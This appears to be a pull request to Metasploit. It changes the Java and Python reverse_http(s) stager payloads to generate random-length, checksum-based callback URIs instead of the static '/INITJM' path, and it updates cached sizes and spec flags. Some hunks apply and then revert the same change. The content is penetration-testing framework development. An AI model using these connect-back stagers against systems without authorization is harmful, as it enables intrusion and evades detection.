### PR TITLE
Dynamic URI generation for Java/Python reverse_http(s) stagers

### DIFF
--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
 
 module Metasploit3
 
-  CachedSize = 5500
+  CachedSize = :dynamic
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
@@ -45,7 +45,9 @@ module Metasploit3
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/INITJM\n"
+    c << "/"
+    c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ,30+rand(256-30))
+    c << "\n"
 
     c
   end

--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
 
 module Metasploit3
 
-  CachedSize = :dynamic
+  CachedSize = 5499
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
@@ -40,13 +40,21 @@ module Metasploit3
   end
 
   def config
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
+
     spawn = datastore["Spawn"] || 2
     c =  ""
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
     c << "/"
-    c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ,30+rand(256-30))
+    c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
     c << "\n"
 
     c

--- a/modules/payloads/stagers/java/reverse_https.rb
+++ b/modules/payloads/stagers/java/reverse_https.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https'
 
 module Metasploit3
 
-  CachedSize = :dynamic
+  CachedSize = 6307
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
@@ -42,13 +42,21 @@ module Metasploit3
   end
 
   def config
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
+
     spawn = datastore["Spawn"] || 2
     c =  ""
     c << "Spawn=#{spawn}\n"
     c << "URL=https://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
     c << "/"
-    c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ,30+rand(256-30))
+    c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
     c << "\n"
 
     c

--- a/modules/payloads/stagers/java/reverse_https.rb
+++ b/modules/payloads/stagers/java/reverse_https.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https'
 
 module Metasploit3
 
-  CachedSize = 6308
+  CachedSize = :dynamic
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
@@ -47,7 +47,9 @@ module Metasploit3
     c << "Spawn=#{spawn}\n"
     c << "URL=https://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/INITJM\n"
+    c << "/"
+    c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ,30+rand(256-30))
+    c << "\n"
 
     c
   end

--- a/modules/payloads/stagers/python/reverse_http.rb
+++ b/modules/payloads/stagers/python/reverse_http.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
 
 module Metasploit3
 
-  CachedSize = 442
+  CachedSize = 446
 
   include Msf::Payload::Stager
 
@@ -50,7 +50,7 @@ module Metasploit3
     target_url << ':'
     target_url << datastore['LPORT'].to_s
     target_url << '/'
-    target_url << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP)
+    target_url << generate_callback_uri
 
     proxy_host = datastore['PayloadProxyHost'].to_s
     proxy_port = datastore['PayloadProxyPort'].to_i
@@ -77,4 +77,36 @@ module Metasploit3
     b64_stub << "')))"
     return b64_stub
   end
+
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    # Start with our cached default generated size
+    space = cached_size
+
+    # Add 100 bytes for the encoder to have some room
+    space += 100
+
+    # Make room for the maximum possible URL length
+    space += 256
+
+    # The final estimated size
+    space
+  end
+
+  #
+  # Return the longest URL that fits into our available space
+  #
+  def generate_callback_uri
+    uri_req_len = 30 + rand(256-30)
+
+    # Generate the short default URL if we don't have enough space
+    if self.available_space.nil? || required_space > self.available_space
+      uri_req_len = 5
+    end
+
+    generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP, uri_req_len)
+  end
+
 end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -885,7 +885,7 @@ describe 'modules/payloads', :content do
                               'stagers/java/reverse_http',
                               'stages/java/meterpreter'
                           ],
-                          dynamic_size: true,
+                          dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'java/meterpreter/reverse_http'
   end
@@ -896,7 +896,7 @@ describe 'modules/payloads', :content do
                               'stagers/java/reverse_https',
                               'stages/java/meterpreter'
                           ],
-                          dynamic_size: true,
+                          dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'java/meterpreter/reverse_https'
   end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -885,7 +885,7 @@ describe 'modules/payloads', :content do
                               'stagers/java/reverse_http',
                               'stages/java/meterpreter'
                           ],
-                          dynamic_size: false,
+                          dynamic_size: true,
                           modules_pathname: modules_pathname,
                           reference_name: 'java/meterpreter/reverse_http'
   end
@@ -896,7 +896,7 @@ describe 'modules/payloads', :content do
                               'stagers/java/reverse_https',
                               'stages/java/meterpreter'
                           ],
-                          dynamic_size: false,
+                          dynamic_size: true,
                           modules_pathname: modules_pathname,
                           reference_name: 'java/meterpreter/reverse_https'
   end


### PR DESCRIPTION
This updates the Java and Python reverse_http(s) stagers to use dynamic URI lengths. In the case of Java, this also moves from static strings (/INITJM) to the checksum URI model.
